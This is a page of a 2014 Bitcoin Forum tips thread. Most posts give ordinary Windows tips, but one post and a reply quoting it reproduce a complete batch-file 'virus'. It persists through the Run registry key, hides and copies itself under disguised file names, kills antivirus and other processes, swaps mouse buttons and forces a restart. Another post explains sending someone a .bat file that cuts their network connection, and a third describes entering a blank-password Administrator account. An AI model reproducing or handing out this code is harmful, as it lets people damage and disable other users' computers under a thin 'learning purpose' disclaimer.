Bitcoin Forum
May 24, 2024, 01:31:14 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 2 [3]  All
  Print  
Author Topic: Computer Tips, Tricks, Facts and Info  (Read 5191 times)
This is a self-moderated topic. If you do not want to be moderated by the person who started this topic, create a new topic.
Anduck
Legendary
*
Offline Offline

Activity: 1511
Merit: 1072


quack


View Profile
July 30, 2014, 01:48:42 PM
 #41

ALT is the key. Press ALT in Windows panels like Control Panel. Magical...
As far as I know It just takes you to the menu and underlines the combination of shortcut keys that you can use with Alt key. like pressing alt in control panel will take you to menu bar and will underline keys that you can use as combination with Alt.

In Windows 7 it shows a menu I at least don't see otherwise. This happens in the control panel..

Oh, and another computer tip: It's worth learning Linux.

rohnearner (OP)
Sr. Member
****
Offline Offline

Activity: 350
Merit: 252

REAL-EYES || REAL-IZE || REAL-LIES||


View Profile WWW
August 04, 2014, 05:19:43 PM
 #42

How to stop someone's internet access

Launch Notepad Type in:
 
Code:
@Echo off
Ipconfig /release
Save that as a .bat and send it to someone. They're IP address will be lost when they launch it, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in

Code:
@Echo off
IPconfig /renew

rohnearner (OP)
Sr. Member
****
Offline Offline

Activity: 350
Merit: 252

REAL-EYES || REAL-IZE || REAL-LIES||


View Profile WWW
August 12, 2014, 07:08:10 PM
 #43

Very Dangerous Notepad virus
Note: Only for learning purpose


This virus can:
>Copy itself into startup

>Copy itself over one thousand times into random spots in your computer

>Hide its self and all other created files

>Task kill MSN, Norton, Windows Explorer, Limewire.

>Swap the left mouse button with the right one

>Opens alert boxes

>Changes the time to 12:00 and shuts down the computer

* Step 1>>Open Notepad.
* Step 2>>Copy This Code ..
Code :--
--------------- --------------- --------------- --------------- --------------- --------------- ------
Code:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Gr eatgame>nul
reg add HKLM\Software\M icrosoft\Window s\CurrentVersio n\Run /v Greatgame /t REG_SZ
/ d %systemroot%\Grea tgame.bat /f>nul
copy %0 *.bat>nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.Swap MouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\d esktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c"VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofil e%\desktop
copy Greatgame.bat %random%.bat
goto RIP
--------------- --------------- --------------- --------------- --------------- --------------- --------------- ----
copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).

**Don't try on anyone's PC , even if you do do it on your own risk .!

Omikifuse
Legendary
*
Offline Offline

Activity: 1764
Merit: 1009



View Profile
August 12, 2014, 10:12:01 PM
 #44

Very Dangerous Notepad virus
Note: Only for learning purpose


This virus can:
>Copy itself into startup

>Copy itself over one thousand times into random spots in your computer

>Hide its self and all other created files

>Task kill MSN, Norton, Windows Explorer, Limewire.

>Swap the left mouse button with the right one

>Opens alert boxes

>Changes the time to 12:00 and shuts down the computer

* Step 1>>Open Notepad.
* Step 2>>Copy This Code ..
Code :--
--------------- --------------- --------------- --------------- --------------- --------------- ------
Code:
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Gr eatgame>nul
reg add HKLM\Software\M icrosoft\Window s\CurrentVersio n\Run /v Greatgame /t REG_SZ
/ d %systemroot%\Grea tgame.bat /f>nul
copy %0 *.bat>nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.Swap MouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\d esktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c"VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofil e%\desktop
copy Greatgame.bat %random%.bat
goto RIP
--------------- --------------- --------------- --------------- --------------- --------------- --------------- ----
copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).

**Don't try on anyone's PC , even if you do do it on your own risk .!


Hum.

Mind to share what I need to know to do stuff like this?

And does this works on windows without administrator privileges?
elliwilli
Sr. Member
****
Offline Offline

Activity: 307
Merit: 250


et rich or die tryi


View Profile WWW
August 12, 2014, 10:31:12 PM
 #45

Ctrl+Shift+t will re-open a closed tab. its so useful!

OsemBro
Newbie
*
Offline Offline

Activity: 12
Merit: 0


View Profile
August 16, 2014, 01:29:49 PM
 #46

Access Administrator account: Windows XP ( not sure for Windows 7)
Steps:
1: Boot your computer.
2: Wait for the computer to list all available accounts.
3: Double click Ctrl+Alt+Del twice.
4: A window will appear with User and Passwords.
5: Type "Administrator" in the User space and leave the Password as it is. Click OK and VOILA!! You have entered the Administrator account.

Administrator account is like the first account ever created in a Windows, its different from the account from when we buy a new laptop. I think this is why the "Run as administrator" option is available in Win Vista and 7, although i havent tried to access the administrator account.
   
CozyLife
Member
**
Offline Offline

Activity: 84
Merit: 10

Theymos, unban my account.


View Profile WWW
August 16, 2014, 05:30:46 PM
 #47

Sweet! That kid seriously has an interesting life, that's for sure. I wish I was that skilled at hacking. I'm an ethical hacker, but I doubt I could get into a NASA computer. However, the government here is often full of potholes because of all the red tape. The sites don't look all that hard to attack, but the military would probably try much harder for their security. I've never hacked the government as I don't have a reason to, but it would be interesting to see if I could do it with permission.

Due to an article that BitcoinTalk didn't like that I wrote on CCN, my account is banned. Theymos refuses to reply to my request for hearing his side of the story instead of banning my account. Please sign my petition to get Theymos to unban my account. Thank you.
Singlebyte
Hero Member
*****
Offline Offline

Activity: 854
Merit: 1000



View Profile
August 16, 2014, 08:47:23 PM
Last edit: August 16, 2014, 08:59:30 PM by Singlebyte
 #48

Tip of the Day: Remove old useless drivers

Every time you attach a piece of hardware to your PC, whether it is a USB stick, a new graphics card or a keyboard/mouse, the drivers get installed for that device to become usable by Windows. This is perfectly fine but a problem arises when the device is not going to be permanently connected and may be something you plug-in once and never have to again. Unless you specifically remove the driver by uninstalling through any software which accompanied it, the chances are there will still be an entry for that device left in Windows long after it was removed. Windows will still try to look for and start these devices when booting and although the difference may be tiny, hundreds of them could affect booting time and system performance, especially on older machines. Issues when installing new hardware might also be caused by an old driver conflicting with a new one. Read More

Great Utility for removing Ghost Drivers:
GhostBusters



Tip for Day:  Clean-up all your start up programs.

Here is a great utility for cleaning up all those programs that get installed in the hidden registry entries, startup folders and initialization files.  you can edit, delete, or temporarily disable these programs very easily.

Great utility for cleaning up your startup apps.
CodeStuff Starter
Pages: « 1 2 [3]  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!